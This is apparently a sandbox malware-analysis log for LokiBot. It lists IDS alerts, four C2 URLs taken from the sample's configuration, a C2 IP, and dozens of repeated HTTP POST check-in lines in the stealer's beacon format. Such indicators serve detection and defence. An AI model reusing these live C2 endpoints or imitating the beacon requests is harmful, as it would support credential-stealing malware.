Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51581 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51582 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51582 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51582 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51581 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51581 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51582 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51582 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51368 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51368 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51368 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51368 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51571 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51368 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51571 -> 94.156.177.41:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: global traffic

TCP traffic: 192.168.2.8:51227 -> 162.159.36.2:53

Source: Joe Sandbox View

IP Address: 94.156.177.41 94.156.177.41

Source: Joe Sandbox View

ASN Name: NET1-ASBG NET1-ASBG

Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
